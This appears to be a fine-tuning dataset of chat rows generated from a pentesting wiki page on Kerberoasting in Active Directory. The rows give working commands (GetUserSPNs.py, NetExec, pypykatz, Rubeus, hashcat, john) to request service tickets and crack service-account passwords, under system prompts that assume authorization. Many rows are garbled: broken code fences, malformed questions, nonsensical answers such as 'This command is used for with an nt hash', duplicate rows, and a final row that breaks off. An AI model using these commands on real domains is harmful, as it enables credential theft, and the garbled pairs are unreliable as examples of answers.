"content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Kerberoast - Theory?"}, {"role": "assistant", "content": "When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the service name (sname) of the service wanted. If the TGT is valid, and if the service exists, the KDC sends the ST to the requesting user.\n\nMultiple formats are accepted for the sname field: servicePrincipalName (SPN), sAMAccountName (SAN), userPrincipalName (UPN), etc. (see Kerberos tickets \"cname formats\").\n\nThe ST is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a service (by its SAN or SPN), he can request a ST for this service and crack it offline later in an attempt to retrieve that service account's password.\n\nIn most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Kerberoast - Theory?", "response": "When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the service name (sname) of the service wanted. If the TGT is valid, and if the service exists, the KDC sends the ST to the requesting user.\n\nMultiple formats are accepted for the sname field: servicePrincipalName (SPN), sAMAccountName (SAN), userPrincipalName (UPN), etc. (see Kerberos tickets \"cname formats\").\n\nThe ST is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a service (by its SAN or SPN), he can request a ST for this service and crack it offline later in an attempt to retrieve that service account's password.\n\nIn most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting.", "metadata": {"corpus_index": 632, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberoast - Theory?"}, {"role": "assistant", "content": "When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the service name (sname) of the service wanted. If the TGT is valid, and if the service exists, the KDC sends the ST to the requesting user.\n\nMultiple formats are accepted for the sname field: servicePrincipalName (SPN), sAMAccountName (SAN), userPrincipalName (UPN), etc. (see Kerberos tickets \"cname formats\").\n\nThe ST is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a service (by its SAN or SPN), he can request a ST for this service and crack it offline later in an attempt to retrieve that service account's password.\n\nIn most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberoast - Theory?", "response": "When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the service name (sname) of the service wanted. If the TGT is valid, and if the service exists, the KDC sends the ST to the requesting user.\n\nMultiple formats are accepted for the sname field: servicePrincipalName (SPN), sAMAccountName (SAN), userPrincipalName (UPN), etc. (see Kerberos tickets \"cname formats\").\n\nThe ST is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a service (by its SAN or SPN), he can request a ST for this service and crack it offline later in an attempt to retrieve that service account's password.\n\nIn most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting.", "metadata": {"corpus_index": 632, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Kerberoast - Practice?"}, {"role": "assistant", "content": "> [!IMPORTANT]\n> Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials), except in the Kerberoasting without pre-authentication scenario.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n> [!TIP]\n> The Kerberoasting attack can be conducted without knowing any SPN of the target account, since a service ticket can be request for as long as the service's SAN (sAMAccountName) is known. (swarm.ptsecurity.com)\n> \n> Nota bene, Kerberos can deliver service tickets even if the service has no SPN at all, but then the service's SAN must end with $, and in this case it's hard to know for sure if the service's password is defined by a human. Kerberoast attacks usually target user accounts with at least one SPN (servicePrincipalName) since they probably have human-defined passwords (sources: Twitter and [\\[MS-KILE\\] section 3.3.5.1.1](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/a7ad31b0-37a4-4344-b9a7-01d4d086097e)).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Kerberoast - Practice?", "response": "> [!IMPORTANT]\n> Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials), except in the Kerberoasting without pre-authentication scenario.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n> [!TIP]\n> The Kerberoasting attack can be conducted without knowing any SPN of the target account, since a service ticket can be request for as long as the service's SAN (sAMAccountName) is known. (swarm.ptsecurity.com)\n> \n> Nota bene, Kerberos can deliver service tickets even if the service has no SPN at all, but then the service's SAN must end with $, and in this case it's hard to know for sure if the service's password is defined by a human. Kerberoast attacks usually target user accounts with at least one SPN (servicePrincipalName) since they probably have human-defined passwords (sources: Twitter and [\\[MS-KILE\\] section 3.3.5.1.1](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/a7ad31b0-37a4-4344-b9a7-01d4d086097e)).\n\n```bash", "metadata": {"corpus_index": 633, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberoast - Practice?"}, {"role": "assistant", "content": "> [!IMPORTANT]\n> Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials), except in the Kerberoasting without pre-authentication scenario.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n> [!TIP]\n> The Kerberoasting attack can be conducted without knowing any SPN of the target account, since a service ticket can be request for as long as the service's SAN (sAMAccountName) is known. (swarm.ptsecurity.com)\n> \n> Nota bene, Kerberos can deliver service tickets even if the service has no SPN at all, but then the service's SAN must end with $, and in this case it's hard to know for sure if the service's password is defined by a human. Kerberoast attacks usually target user accounts with at least one SPN (servicePrincipalName) since they probably have human-defined passwords (sources: Twitter and [\\[MS-KILE\\] section 3.3.5.1.1](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/a7ad31b0-37a4-4344-b9a7-01d4d086097e)).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberoast - Practice?", "response": "> [!IMPORTANT]\n> Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials), except in the Kerberoasting without pre-authentication scenario.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n> [!TIP]\n> The Kerberoasting attack can be conducted without knowing any SPN of the target account, since a service ticket can be request for as long as the service's SAN (sAMAccountName) is known. (swarm.ptsecurity.com)\n> \n> Nota bene, Kerberos can deliver service tickets even if the service has no SPN at all, but then the service's SAN must end with $, and in this case it's hard to know for sure if the service's password is defined by a human. Kerberoast attacks usually target user accounts with at least one SPN (servicePrincipalName) since they probably have human-defined passwords (sources: Twitter and [\\[MS-KILE\\] section 3.3.5.1.1](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/a7ad31b0-37a4-4344-b9a7-01d4d086097e)).\n\n```bash", "metadata": {"corpus_index": 633, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of with a password"}, {"role": "assistant", "content": "GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of with a password", "response": "GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'", "metadata": {"corpus_index": 634, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute with a password?"}, {"role": "assistant", "content": "GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute with a password?", "response": "GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'", "metadata": {"corpus_index": 634, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does with an NT hash work?"}, {"role": "assistant", "content": "GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter\n`\n\nUsing pypykatz (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack $krb5tgs$23 takes less time than for krb5tgs$18.\n\n`bash\npypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\\username:Password@IP'\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt\n`\n\n:::\n\nHashcat and JohnTheRipper can then be used to try cracking the hash.\n\n`bash\nhashcat -m 13100 kerberoastables.txt $wordlist\n`\n\n`bash\njohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txt\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does with an NT hash work?", "response": "GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter\n`\n\nUsing pypykatz (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack $krb5tgs$23 takes less time than for krb5tgs$18.\n\n`bash\npypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\\username:Password@IP'\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt\n`\n\n:::\n\nHashcat and JohnTheRipper can then be used to try cracking the hash.\n\n`bash\nhashcat -m 13100 kerberoastables.txt $wordlist\n`\n\n`bash\njohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txt\n``", "metadata": {"corpus_index": 635, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with an NT hash?"}, {"role": "assistant", "content": "GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter\n`\n\nUsing pypykatz (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack $krb5tgs$23 takes less time than for krb5tgs$18.\n\n`bash\npypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\\username:Password@IP'\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt\n`\n\n:::\n\nHashcat and JohnTheRipper can then be used to try cracking the hash.\n\n`bash\nhashcat -m 13100 kerberoastables.txt $wordlist\n`\n\n`bash\njohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txt\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with an NT hash?", "response": "GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter\n`\n\nUsing pypykatz (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack $krb5tgs$23 takes less time than for krb5tgs$18.\n\n`bash\npypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\\username:Password@IP'\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt\n`\n\n:::\n\nHashcat and JohnTheRipper can then be used to try cracking the hash.\n\n`bash\nhashcat -m 13100 kerberoastables.txt $wordlist\n`\n\n`bash\njohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txt\n``", "metadata": {"corpus_index": 635, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Using for with an nt hash?"}, {"role": "assistant", "content": "Using [pypykatz](https://github.com/skelsec/pypykatz/wiki/Kerberos-spnroast-command) (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack `$krb5tgs$23` takes less time than for `krb5tgs$18`."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Using for with an nt hash?", "response": "Using [pypykatz](https://github.com/skelsec/pypykatz/wiki/Kerberos-spnroast-command) (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack `$krb5tgs$23` takes less time than for `krb5tgs$18`.", "metadata": {"corpus_index": 636, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Using"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do with an NT hash"}, {"role": "assistant", "content": "Using [pypykatz](https://github.com/skelsec/pypykatz/wiki/Kerberos-spnroast-command) (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack `$krb5tgs$23` takes less time than for `krb5tgs$18`."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do with an NT hash", "response": "Using [pypykatz](https://github.com/skelsec/pypykatz/wiki/Kerberos-spnroast-command) (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack `$krb5tgs$23` takes less time than for `krb5tgs$18`.", "metadata": {"corpus_index": 636, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with an NT hash?"}, {"role": "assistant", "content": "=== Windows\n\n[Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used for that purpose."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with an NT hash?", "response": "=== Windows\n\n[Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used for that purpose.", "metadata": {"corpus_index": 637, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for with an nt hash. with an NT hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for with an nt hash. with an NT hash", "metadata": {"corpus_index": 637, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with an NT hash?"}, {"role": "assistant", "content": ":::\n\n\n[Hashcat](https://github.com/hashcat/hashcat) and [JohnTheRipper](https://github.com/magnumripper/JohnTheRipper) can then be used to try [cracking the hash](../credentials/cracking.md)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with an NT hash?", "response": ":::\n\n\n[Hashcat](https://github.com/hashcat/hashcat) and [JohnTheRipper](https://github.com/magnumripper/JohnTheRipper) can then be used to try [cracking the hash](../credentials/cracking.md).", "metadata": {"corpus_index": 638, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for with an nt hash. with an NT hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for with an nt hash. with an NT hash", "metadata": {"corpus_index": 638, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do with an NT hash"}, {"role": "assistant", "content": "```bash\njohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do with an NT hash", "response": "```bash\njohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txt", "metadata": {"corpus_index": 639, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ````bash`?"}, {"role": "assistant", "content": "This command is used for with an nt hash. with an NT hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ````bash`?", "response": "This command is used for with an nt hash. with an NT hash", "metadata": {"corpus_index": 639, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Kerberoast - Kerberoast w/o pre-authentication"}, {"role": "assistant", "content": "In September 2022, Charlie Cark explained how Service Tickets could be obtained through AS-REQ requests (which are usually used for TGT requests), instead of the usual TGS-REQ. He demonstrated (and implemented) how to abuse this in a Kerberoasting scenario.\n\nIf an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#1413)_ _adding the -no-preauth option for GetUserSPNs.py is pending._\n\n``bash\nGetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/\n`\n\n`\nsrv01\ncifs/srv02.domain.local\ncifs/srv02\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#139)_ _adding the /nopreauth option for Rubeus' kerberoast command is pending._\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Kerberoast - Kerberoast w/o pre-authentication", "response": "In September 2022, Charlie Cark explained how Service Tickets could be obtained through AS-REQ requests (which are usually used for TGT requests), instead of the usual TGS-REQ. He demonstrated (and implemented) how to abuse this in a Kerberoasting scenario.\n\nIf an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#1413)_ _adding the -no-preauth option for GetUserSPNs.py is pending._\n\n``bash\nGetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/\n`\n\n`\nsrv01\ncifs/srv02.domain.local\ncifs/srv02\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#139)_ _adding the /nopreauth option for Rubeus' kerberoast command is pending._\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"\n``\n\n:::", "metadata": {"corpus_index": 640, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/kerberoast.md", "page_title": "Kerberoast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Kerberoast - Kerberoast w/o pre-authentication?"}, {"role": "assistant", "content": "In September 2022, Charlie Cark explained how Service Tickets could be obtained through AS-REQ requests (which are usually used for TGT requests), instead of the usual TGS-REQ. He demonstrated (and implemented) how to abuse this in a Kerberoasting scenario.\n\nIf an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#1413)_ _adding the -no-preauth option for GetUserSPNs.py is pending._\n\n``bash\nGetUserSPNs.py -no-preauth \"bobby\" -usersfile \"services.txt\" -dc-host \"DC_IP_or_HOST\" \"DOMAIN.LOCAL\"/\n`\n\n`\nsrv01\ncifs/srv02.domain.local\ncifs/srv02\n`\n\n=== Windows\n\nRubeus (C#) can be used for that purpose.\n\n_At the time of writing, Sept. 28th 2022,_ _the pull request (#139)_ _adding the /nopreauth option for Rubeus' kerberoast command is pending._\n\n`powershell\nRubeus.exe kerberoast /outfile:kerberoastables.txt /domain:\"DOMAIN.LOCAL\" /dc:\"DC01.DOMAIN.LOCAL\" /nopreauth:\"nopreauth_user\" /spn:\"target_service\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Kerberoast - Kerberoast w/o pre-authentication?", "response": "In September 2022, Charlie Cark explained how Service Tickets could be obtained through AS-REQ requests (which are usually used for TGT requests), instead of the usual TGS-REQ. He demonstrated (and implemented) how to abuse this in a Kerberoasting scenario.\n\nIf an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won't be required).\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain 